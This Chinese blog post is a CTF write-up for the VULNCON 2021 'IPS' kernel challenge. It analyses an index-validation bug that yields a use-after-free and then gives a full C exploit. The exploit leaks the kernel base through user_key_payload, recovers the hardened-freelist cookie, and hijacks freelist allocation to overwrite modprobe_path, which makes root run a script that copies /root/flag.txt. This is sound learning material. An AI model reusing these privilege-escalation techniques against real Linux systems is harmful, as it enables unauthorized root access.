VULNCON CTF 2021 -- IPS

已于 2024-05-09 18:19:52 修改
阅读量275 收藏 3
点赞数 5
分类专栏: # kernel-pwn 文章标签: 劫持freelist
于 2024-05-09 18:10:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61670993/article/details/138622346
版权

前言

这个题目折磨了我接近一天,服气了,题目不算难,但是利用写得的疯掉了~~~

然后这个题目跟之前的不同,之前的题目都是实现一个内核模块,而这个题目是直接实现了一个系统调用(:所以这里不存在一些条件竞争的漏洞

题目分析

  • 内核版本 v5.14.16
  • smap/smep/kpti/kaslr 全开
  • 设置了 CONFIG_SLAB_FREELIST_HARDENED/RANDOM 编译选项,但是没有 cg 隔离
  • modprobe_path 可劫持

题目给了源码:

#include <linux/kernel.h>
#include <linux/syscalls.h>
#include <linux/module.h>
#include <linux/string.h>
#include <linux/fdtable.h>

#ifndef __NR_IPS
#define __NR_IPS 548
#endif

#define MAX 16

typedef struct {
  int idx;
  unsigned short priority;
  char *data;
} userdata;

typedef struct {
  void *next;
  int idx;
  unsigned short priority;
  char data[114];
} chunk;

chunk *chunks[MAX] = {NULL};
int last_allocated_idx = -1;

int get_idx(void) {
  int i;
  for(i = 0; i < MAX; i++) {
    if(chunks[i] == NULL) {
      return i;
    }
  }
  return -1;
}

int check_idx(int idx) {
  if(idx < 0 || idx >= MAX) return -1;
  return idx;
}

int remove_linked_list(int idx) {
  int i;
  for(i = 0; i < MAX; i++) {
    if(i == idx) continue;
    if(chunks[i]->next == chunks[idx]) {
      chunks[i]->next = chunks[idx]->next;
      break;
    }
  }
  return 0;
}

int alloc_storage(unsigned int priority, char *data) {
  int idx = get_idx();
  if((idx = check_idx(idx)) < 0) return -1;
  chunks[idx] = kmalloc(sizeof(chunk), GFP_KERNEL);

  if(last_allocated_idx >= 0 && !(chunks[last_allocated_idx]->next)) {
    chunks[last_allocated_idx]->next = chunks[idx];
  }

  chunks[idx]->next = NULL;
  chunks[idx]->idx = idx;
  chunks[idx]->priority = priority;
  memcpy(chunks[idx]->data, data, strlen(data));
  last_allocated_idx = idx;

  return idx;
}

int remove_storage(int idx) {
  if((idx = check_idx(idx)) < 0) return -1;
  if(chunks[idx] == NULL) return -1;

  int i;
  for(i = 0; i < MAX; i++) {
    if(i != idx && chunks[i] == chunks[idx]) { // 删除了所有引用
      chunks[i] = NULL;
    }
  }

  kfree(chunks[idx]);
  chunks[idx] = NULL;

  return 0;
}

int edit_storage(int idx, char *data) {
  if((idx = check_idx(idx)) < 0); // 这里 idx 如果是非法的并没有 return,而是继续向下执行,所以这里的检查其实没用
  if(chunks[idx] == NULL) return -1;
  // 这里可能存在越界
  memcpy(chunks[idx]->data, data, strlen(data));

  return 0;
}

int copy_storage(int idx) {
  if((idx = check_idx(idx)) < 0) return -1;
  if(chunks[idx] == NULL) return -1;

  int target_idx = get_idx(); // 没有对 target_idx 进行合法性检查,target_idx 可能是 -1
  chunks[target_idx] = chunks[idx];
  return target_idx;
}

SYSCALL_DEFINE2(ips, int, choice, userdata *, udata) {
  char data[114] = {0};
  if(udata->data && strlen(udata->data) < 115) {
    if(copy_from_user(data, udata->data, strlen(udata->data))) return -1;
  }
  switch(choice) {
    case 1: return alloc_storage(udata->priority, data);
    case 2: return remove_storage(udata->idx);
    case 3: return edit_storage(udata->idx, data);
    case 4: return copy_storage(udata->idx);
    default: return -1;
  }
}

可以看到,代码主要实现了 __NR_IPS 系统调用,共 4 个功能,实现了堆块的增、删、复制、改。这里一开始就感觉 copy 存在问题,因为这里只是单纯的复制了指针,如果在释放堆块时没有正确处理则会导致 UAF,但是查看 remove 代码可以发现,在删除一个堆块时,会清空所有对其的引用,所有这里也就自然不存在相关漏洞

但是仔细观察,可以发现 copy 中确实存在一个漏洞,当 chunks 数组满时,如果此时调用 copy,这里的 get_idx 函数会因为找不到合适的位置而返回 -1,但是这里却没用对 target_idx 进行合法性检测,从而导致了数组越界(:往上溢出 1 [8 bytes]

然后看 remove 函数,其只检测 [0, MAX) 中的索引,所以这里 -1 就被排除在外了,所以可以利用其来构造一个 UAF

这里单纯一个 UAF 还构不成太大的问题,但是在 edit 中存在同样的问题,对于传入的 idx,如果其不合法,则应该直接返回,但是 edit 仍然利用其进行写入:

int edit_storage(int idx, char *data) {
  // 这里 idx 如果是非法的并没有 return,而是继续向下执行,所以这里的 idx 可能为 -1
  if((idx = check_idx(idx)) < 0); 
  if(chunks[idx] == NULL) return -1;
  
  memcpy(chunks[idx]->data, data, strlen(data));

  return 0;
}

可以看到这里仅仅是判断是否合法,但是没有做出相应的反应,所以这里就可以对释放的堆块进行写入了,所以这里我们获得了一个强大的原语:kmalloc-128 UAF,可进行写入

漏洞利用

构造越界读
由于开启了 kaslr,所以第一步得泄漏 kbase,这里由于没开启 cg 隔离,所以比较简单,kmalloc-128 可以利用 msg_msg 或者 user_key_payload 去进行越界读(:msg_msg 还可以实现任意地址读,但是笔者喜欢用 user_key_payload,思路如下:

  • add 16 次,使得 chunks 被占满
  • copy(idx),使得 chunks[-1] = chunks[idx]
  • dele(idx) 释放 chunks[idx],由于 dele 只会检查 [0, 16) 之间的索引,所以 chunks[-1] 被保留,这里堆块记作 UAF chunk
  • 申请 user_key_payload 占据 UAF chunk
  • 利用 edit(-1) 修改 UAF chunk 即修改 user_key_payload,此时就可以把 user_key_payloaddatalen 改大从而实现越界读(:后面泄漏 kbase 就比较简单了,可以先提前堆块一些 user_key_payloadrevoke

思路一:USMA
泄漏完 kbase,笔者的第一想法就是 USMA,因为这里 UAF chunk 是可以被写入的,这里思路如下:

  • 释放掉 user_key_payloadUAF chunk
  • 申请 pgv 占据 UAF chunk
  • 利用 edit(-1) 修改 UAF chunk 即修改 pgv 即可进行 USMA

但是测试发现没有相关 cap,于是无法创建新的 namespace,所以这个思路就放弃了

思路二:劫持 freelist
然后第二个思路就是去劫持 freelist 实现任意地址分配了,这里思路如下:

  • 释放掉 user_key_payloadUAF chunk
  • 利用 edit(-1) 修改 UAF chunknext 指针从而劫持 freelist

这里来探索下该思路的可行性,首先,edit(-1) 只能修改 ptr + 8 + 6 之后的内存,但是这里调试发现 kmalloc-128offset0x40,所以这里是可以覆写到 next 域的

然后就是去绕过 CONFIG_SLAB_FREELIST_HARDENED 了,而且这里的异或加密还做了加强:ptr_addr 会进行字节翻转后才进行异或,所以这里仅仅靠越界读是无法泄漏 cookie

所以这里想要泄漏 cookie 需要泄漏两个堆地址和其与 cookie 的异或加密值(其实就是最原始的泄漏方法,xor_val = swap(chunk1+0x40) ^ cookie ^ chunk2,所以我们去泄漏 xor_val/chunk1/chunk2,这样就可以泄漏 cookie 了)

这里就得利用 chunk 结构体上的 next 指针了,我们在构造越界读时,可以通过堆风水(单纯申请就行了,就是成功率低一些,但是省事啊)把 chunk 也布置在 user_key_payload 的下方,这里通过越界读就可以泄漏每个 chunknext 值,这里就相当于泄漏的堆地址,并且可以通过 idx 确定当前 next 是哪一个 chunk 的地址,比如 chunk[idx]->next = chunk[idx+1],那如何确定 chunk[-1] 也就是 UAF chunk 的地址呢?其实也简单,越界读是连续的,所以通过某个 chunk[idx] 距离读取起始地址的偏移即可确定 chunk[-1] 的地址

这里假设泄漏了 chunk[i]、chunk[j] 的地址,那么后续利用如下:

  • 释放 chunk[i] chunk[j] 此时 freelist->chunk[j]->chun[i]
  • 利用越界读泄漏 xor_val,然后就可以计算出 cookie
  • 释放掉 user_key_payloadUAF chunk
  • 利用 edit(-1) 修改 UAF chunknext 指针为 cookie ^ swap(chunk[-1]+0x40) ^ (modprobe_path+offset)
    • 这里 modprobe_path 存在 offset 是因为如果你后面利用 chunk 结构占据堆块的话,只能从 +8+6 位置开始写;如果用 user_key_payload 占据的话,只能从 +0x18 位置开始写
  • 然后连续两次申请即可申请到 modprobe_path 附近的内存,然后就可以修改 modprobe_path

最后 exploit 如下:

#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sched.h>
#include <linux/keyctl.h>
#include <ctype.h>
#include <pthread.h>
#include <sys/types.h>
#include <linux/userfaultfd.h>
#include <sys/sem.h>
#include <semaphore.h>
#include <poll.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <asm/ldt.h>
#include <sys/shm.h>
#include <sys/wait.h>
#include <sys/socket.h>
#include <linux/if_packet.h>


void err_exit(char *msg)
{
    perror(msg);
    sleep(1);
    exit(EXIT_FAILURE);
}

void fail_exit(char *msg)
{
    printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
    sleep(1);
    exit(EXIT_FAILURE);
}

void info(char *msg)
{
    printf("\033[32m\033[1m[+] %s\n\033[0m", msg);
}

void hexx(char *msg, size_t value)
{
    printf("\033[32m\033[1m[+] %s: %#lx\n\033[0m", msg, value);
}

void binary_dump(char *desc, void *addr, int len) {
    uint64_t *buf64 = (uint64_t *) addr;
    uint8_t *buf8 = (uint8_t *) addr;
    if (desc != NULL) {
        printf("\033[33m[*] %s:\n\033[0m", desc);
    }
    for (int i = 0; i < len / 8; i += 4) {
        printf("  %04x", i * 8);
        for (int j = 0; j < 4; j++) {
            i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf("                   ");
        }
        printf("   ");
        for (int j = 0; j < 32 && j + i * 8 < len; j++) {
            printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');
        }
        puts("");
    }
}

/* bind the process to specific core */
void bind_core(int core)
{
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

    printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}

#ifndef __NR_IPS
#define __NR_IPS 548
#endif

typedef struct {
  int idx;
  unsigned short priority;
  char *data;
} userdata;

typedef struct {
  uint64_t next;
  int idx;
  unsigned short priority;
  char data[114];
} chunk;

void add(char* data) {
        userdata n = { .data = data };
        if (syscall(__NR_IPS, 1, &n) < 0)
                err_exit("add");
}

void dele(int idx) {
        userdata n = { .idx = idx };
        syscall(__NR_IPS, 2, &n);
}

void edit(int idx, char* data) {
        userdata n = { .idx = idx, .data = data };
        if (syscall(__NR_IPS, 3, &n)) err_exit("deit");
}

void copy(int idx) {
        userdata n = { .idx = idx };
        syscall(__NR_IPS, 4, &n);
}

int key_alloc(char *description, char *payload, size_t plen)
{
    return syscall(__NR_add_key, "user", description, payload, plen,
                   KEY_SPEC_PROCESS_KEYRING);
}

int key_update(int keyid, char *payload, size_t plen)
{
    return syscall(__NR_keyctl, KEYCTL_UPDATE, keyid, payload, plen);
}

int key_read(int keyid, char *buffer, size_t buflen)
{
    return syscall(__NR_keyctl, KEYCTL_READ, keyid, buffer, buflen);
}

int key_revoke(int keyid)
{
    return syscall(__NR_keyctl, KEYCTL_REVOKE, keyid, 0, 0, 0);
}

int key_unlink(int keyid)
{
    return syscall(__NR_keyctl, KEYCTL_UNLINK, keyid, KEY_SPEC_PROCESS_KEYRING);
}

typedef unsigned long long __u64;

#define swap64(x) ((__u64)(                             \
        (((__u64)(x) & (__u64)0x00000000000000ffULL) << 56) |   \
        (((__u64)(x) & (__u64)0x000000000000ff00ULL) << 40) |   \
        (((__u64)(x) & (__u64)0x0000000000ff0000ULL) << 24) |   \
        (((__u64)(x) & (__u64)0x00000000ff000000ULL) <<  8) |   \
        (((__u64)(x) & (__u64)0x000000ff00000000ULL) >>  8) |   \
        (((__u64)(x) & (__u64)0x0000ff0000000000ULL) >> 24) |   \
        (((__u64)(x) & (__u64)0x00ff000000000000ULL) >> 40) |   \
        (((__u64)(x) & (__u64)0xff00000000000000ULL) >> 56)))

void get_flag() {
        system("echo -ne '#!/bin/sh\n/bin/cp /root/flag.txt /home/user/flag.txt\n/bin/chmod 777 /home/user/flag.txt' > /home/user/x");
        system("chmod +x /home/user/x");
        system("echo -ne '\\xff\\xff\\xff\\xff' > /home/user/dummy");
        system("chmod +x /home/user/dummy");
        system("/home/user/dummy");
        sleep(0.3);
        system("cat /home/user/flag.txt");
}

int main(int argc, char** argv, char** envp)
{
        bind_core(0);
        int res;
        char desc[0x20] = { 0 };
        char buf[0x10000] = { 0 };
        uint64_t kbase = 0xffffffff81000000;
        uint64_t koffset = -1;
        uint64_t user_free_payload_rcu = 0xffffffff8137c190;

        for (int i = 0; i < 16; i++) {
                memset(buf, 'A'+i, 0x20);
                add(buf);
        }

        copy(8);
        dele(8);

        sprintf(desc, "%s", "XiaozaYa");
        int key_id = key_alloc(desc, buf, 80);
        if (key_id < 0) err_exit("key_alloc");

        memset(buf, '\xf0', 8);

        edit(-1, buf);

        res = key_read(key_id, buf, 0xff00);
        if (res < 0x1000) fail_exit("failed to overwrite datalen");

        for (int i = 0; i < 15; i++) {
                if (i != 8) dele(i);
        }

        #define SPRAY_KEY_NUMS 16
        int keys[SPRAY_KEY_NUMS];
        for (int i = 0; i < SPRAY_KEY_NUMS; i++) {
                sprintf(desc, "%s%d", "XiaozaYa", i);
                keys[i] = key_alloc(desc, buf, 80);
                if (keys[i] < 0) err_exit("key_alloc");
        }

        for (int i = 0; i < SPRAY_KEY_NUMS; i++) {
                key_revoke(keys[i]);
        }

        res = key_read(key_id, buf, 0xff00);
        for (int i = 0; i < res / 8; i++) {
                uint64_t val = *(uint64_t*)(buf + i*8);
                if ((val&0xfff) == 0x190 && val > 0xffffffff81000000 && ((val>>32)&0xffffffff) == 0xffffffff) {
                        koffset = val - user_free_payload_rcu;
                        kbase += koffset;
                        break;
                }
        }

        if (koffset == -1) fail_exit("failed to bypass kaslr");

        uint64_t modprobe_path = 0xffffffff8244fa20 + koffset;
        printf("[+] koffset: %#llx\n", koffset);
        printf("[+] kbase: %#llx\n", kbase);
        printf("[+] modprobea_path: %#llx\n", modprobe_path);

        memset(buf, 0, sizeof(buf));
        for (int i = 0; i < 15; i++) {
                userdata n = { .data = buf, .priority = 'A'+i };
                syscall(__NR_IPS, 1, &n);
        }

        res = key_read(key_id, buf, 0xff00);
//      binary_dump("LEAK DATA", buf+128-0x18, 128 * 20);
        chunk* h = NULL;
        int nums = 0;
        uint64_t addrs[16] = { 0 };
        uint64_t offsets[16];
        for (int i = 0; i < 16; i++) offsets[i] = -1;
        for (uint64_t i = 0; i < (res - 128 + 0x18) / 128; i++) {
                h = (buf+128-0x18) + i * 128;
                if (h->next > 0xffff000000000000 && (h->next&0xffff000000000000) == 0xffff000000000000 && (h->idx + 'A') == h->priority) {
                        if (h->idx == 15) {
                                addrs[0] = h->next;
                        } else {
                                addrs[h->idx+1] = h->next;
                        }
                        offsets[h->idx] = i;
                }
        }

        #define IDX 0
        #define ADDR 1
        #define OFFSET 2
        uint64_t map[16][3];
        for (int i = 0; i < 16; i++) {
                if (addrs[i] && offsets[i] != -1) {
                        printf("[---offset %03x---] %02d => %#llx\n", offsets[i], i, addrs[i]);
                        map[nums][IDX] = i;
                        map[nums][ADDR] = addrs[i];
                        map[nums][OFFSET] = offsets[i];
                        nums++;
                }
        }

        printf("[+] hit counts: %d\n", nums);
        if (nums < 2) fail_exit("failed to hit");

        uint64_t evil_chunk = map[0][ADDR] - map[0][OFFSET] * 128 - 128;
        printf("[+] evil_chunk: %#llx\n", evil_chunk);

        dele(map[0][IDX]);
        dele(map[1][IDX]);

        res = key_read(key_id, buf, 0xff00);
        uint64_t xor_val0 = *(uint64_t*)(buf+128-0x18+128*map[0][OFFSET]+0x40);
        uint64_t xor_val1 = *(uint64_t*)(buf+128-0x18+128*map[1][OFFSET]+0x40);
        printf("[+] xor_val0: %#llx\n", xor_val0);
        printf("[+] xor_val1: %#llx\n", xor_val1);

        uint64_t cookie = map[0][ADDR] ^ swap64((map[1][ADDR]+0x40)) ^ xor_val1;
        printf("[+] cookie: %#llx\n", cookie);


        memset(buf, '\x00', 0x100);
        memset(buf, 'A', 0x32);
        buf[0] = '\xff';
        buf[1] = '\xff';
        *(uint64_t*)(buf+0x32) = (modprobe_path-8-6) ^ cookie ^ swap64((evil_chunk+0x40));
        printf("[+] evil freelist: %#llx\n", *(uint64_t*)(buf+0x32));
        printf("[+] data len: %x\n", strlen(buf));
        key_revoke(key_id);
//      key_unlink(key_id);
//      edit(-1, buf);
//      edit(-1, buf);
        getchar(); // <=================== 不要删除,不然利用失败
        edit(-1, buf);

        memset(buf, '\x00', 0x100);
        strcpy(buf, "/home/user/x");
        for (int i = 0; i < 2; i++) {
                add(buf);
        }

        get_flag();
//      puts("[+] debug");
//      getchar();

        puts("[+] EXP NERVER END");
        return 0;
}

效果如下:
在这里插入图片描述

存在的问题

首先就是成功率不是很高啦,这个从我的 exploit 就可以看出,笔者并没有优化相关的堆风水,整个堆布局的构建都很简单粗暴,所以成功率低可以理解

关键的问题是可以看到我 exploit 中在修改 chunk[-1]next 时,在前面加上了一个 getchar(),这个 getchar() 不是随意加的,因为笔者测试发现删除该 getchar() 则导致 edit(-1, buf) 写入失败。但是在调试的时候不加又是可以成功写入的,直接运行不加则会导致写入失败:
在这里插入图片描述

XiaozaYa
关注
  • 5
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
D3CTF2021-d3dev
11-05
附件
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
D3CTF2021-non-RCE
feng的博客
03-07 4083
non-RCE 前言 去年D3CTF的题目,最近刚复现完国赛的那道Java,感觉出题的思路也是魔改的这题,所以来复现一下这题。 password绕过 不谈代码了,因为审完之后思路还是比较清晰的,就是利用JDBC对AsjpectJWeaver反序列化写文件到classpath然后反序列化rce。 第一重过滤是这个: public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterCha
*CTF 2022web(CVE-2021-43798)
……
09-04 1413
CVE-2021-43798漏洞复现 *CTF 2022web
CTF Training-WWW-Robots
艺博东的博客
09-25 1万+
题目场景: http://220.249.52.133:31059 (温馨提示:每次进入URL的端口号都不一样) 1、点击链接进入以下界面 2、翻译 看到上面的信息,会想到君子协议 robots.txt; 3、URL为http://220.249.52.133:31059/robots.txt(在最后直接加上“/robots.txt”)—>回车 4、这是URL为http://220.249.52.133:31059/fl0g.php—>回车 5、OK cyberpeace{c598a5
CTF What-is-this
热门推荐
艺博东的博客
10-01 1万+
题目描述: 找到FLAG 题目附件: 附件1 1、附件1 链接:https://pan.baidu.com/s/1hiGglfTDAssjdm-apC4xLw 提取码:82le 2、文件 3、把文件拷贝到kail Linux 4、tar -xvf e66ea8344f034964ba0b3cb9879996ff.gz 5、拷贝到win—>用“Stegsolve”软件打开这两张图片 6、OK AZADI TOWER (温馨提示:这题答案的形式为裸交) ...
CTF ics-04
艺博东的博客
10-05 9932
难度系数: ★★★★ 题目来源: XCTF 4th-CyberEarth 题目描述: 工控云管理系统新添加的登录和注册页面存在漏洞,请找出flag。 题目场景: http://220.249.52.133:52962(温馨提示:每次进入URL的端口号都不一样) 1、点击链接进入如下界面 2、先注册几个账号,相同的用户名 3、登录—>忘记密码 4、忘记密码 5、在kail Linux 里,开始sql注入 执行如下: 5.1 sqlmap ‐u "http://220.249.52.133:5296
CTFHub-sql注入
qq_60905276的博客
01-30 5633
1.整数型注入 先判断有没有注入点 ?id=1 and 1=1 ?id=1 and 1=2 证明有注入点 在输入1看看。 有回显。
CTF Just-No-One
艺博东的博客
10-10 1万+
难度系数: ★★★★ 题目附件: 附件1 1、附件1 链接:https://pan.baidu.com/s/1IB2R0XDKyYBnKX2kCIRFjQ 提取码:8zkt 2、文件(一个应用程序) 3、解题 吐槽: 这题的flag很难找,要很细心,也感觉很奇怪;不知道这题的重点是什么。 用逆向工具包打开程序查看源代码,找了很久也没有找到; kail Linux 也整了很久,也不OK; 4、flag在安装软件的时候,在协议里 flag,很辣眼睛。 5、OK ILOVEREADINGEULAS 温馨提
CVE-2021-41773漏洞复现
dreamthe的博客
10-18 7563
1.安装debian系统 首先我选择的系统是debian10版本,也可以在别的系统完成复现,我想一个纯净版,所有重新安装了一个系统,安装步骤简单展示一下。 1.创建虚拟机,点击下一步。 导入镜像 自己选安装的位置以及虚拟机的名称。 安装过程需要设置管理员密码和新建一个用户,自己设置一下就可以了 这里选择了第二个。 因为之前我们选择了lvm,那么这里选择是就可以了 因为我们需要一个简单系统,所有只选择了下面三个安装软件 中间少的部分就是一直点击继续就可..
CTFHub-Web-HTTP协议
qq_54037445的博客
11-21 1523
CTFHub-Web-Web前置技能-HTTP协议 请求方式、302重定向、cookie、基础认证
zer0pts-CTF-2021:zer0pts CTF 2021
05-06
zer0pts-CTF-2021zer0pts CTF 2021和彩云分流:链接: 提取码:gZce
phack-ctf-2021-public
05-13
P'Hack CTF 2021 该存款汇集了2021年4月2日至11日发生的与P'HackCTF 2021相关的所有来源。 档案文件 职员 Eagleslam( ) relu( ) Pdrooo( ) ( )
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
Java_Spring Boot 3主分支2其他分支和Spring Cloud微服务的分布式配置演示Spring Cl.zip
05-22
Java_Spring Boot 3主分支2其他分支和Spring Cloud微服务的分布式配置演示Spring Cl
ERP客户关系系统设计(含源代码+毕业设计文档)+编程项目+毕业设计
05-22
ERP客户关系系统设计(含源代码+毕业设计文档)+编程项目+毕业设计ERP客户关系系统设计(含源代码+毕业设计文档)+编程项目+毕业设计ERP客户关系系统设计(含源代码+毕业设计文档)+编程项目+毕业设计ERP客户关系系统设计(含源代码+毕业设计文档)+编程项目+毕业设计ERP客户关系系统设计(含源代码+毕业设计文档)+编程项目+毕业设计ERP客户关系系统设计(含源代码+毕业设计文档)+编程项目+毕业设计ERP客户关系系统设计(含源代码+毕业设计文档)+编程项目+毕业设计ERP客户关系系统设计(含源代码+毕业设计文档)+编程项目+毕业设计ERP客户关系系统设计(含源代码+毕业设计文档)+编程项目+毕业设计ERP客户关系系统设计(含源代码+毕业设计文档)+编程项目+毕业设计ERP客户关系系统设计(含源代码+毕业设计文档)+编程项目+毕业设计ERP客户关系系统设计(含源代码+毕业设计文档)+编程项目+毕业设计ERP客户关系系统设计(含源代码+毕业设计文档)+编程项目+毕业设计ERP客户关系系统设计(含源代码+毕业设计文档)+编程项目+毕业设计ERP客户关系系统设计(含源代码+毕业设计文档)
基于MATLAB实现的V两幅图像中有重叠部分,通过数字图像相关算法可以找到两幅图像相同的点+使用说明文档.rar
05-22
CSDN IT狂飙上传的代码均可运行,功能ok的情况下才上传的,直接替换数据即可使用,小白也能轻松上手 【资源说明】 基于MATLAB实现的V两幅图像中有重叠部分,通过数字图像相关算法可以找到两幅图像相同的点+使用说明文档.rar 1、代码压缩包内容 主函数:main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2020b;若运行有误,根据提示GPT修改;若不会,私信博主(问题描述要详细); 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开main.m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可后台私信博主; 4.1 期刊或参考文献复现 4.2 Matlab程序定制 4.3 科研合作 功率谱估计: 故障诊断分析: 雷达通信:雷达LFM、MIMO、成像、定位、干扰、检测、信号分析、脉冲压缩 滤波估计:SOC估计 目标定位:WSN定位、滤波跟踪、目标定位 生物电信号:肌电信号EMG、脑电信号EEG、心电信号ECG 通信系统:DOA估计、编码译码、变分模态分解、管道泄漏、滤波器、数字信号处理+传输+分析+去噪、数字信号调制、误码率、信号估计、DTMF、信号检测识别融合、LEACH协议、信号检测、水声通信 5、欢迎下载,沟通交流,互相学习,共同进步!
全球国家列表和国家代码最详细版本
最新发布
05-22
全球国家列表和国家代码最全最详细版本,国家country,code
ctfhub-git泄露stash
09-13
根据引用和引用提供的信息,你可以尝试使用GitHack和dirsearch工具来扫描和利用ctfhub-git的泄露。首先,进入GitHack文件夹,执行命令"python GitHack.py ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值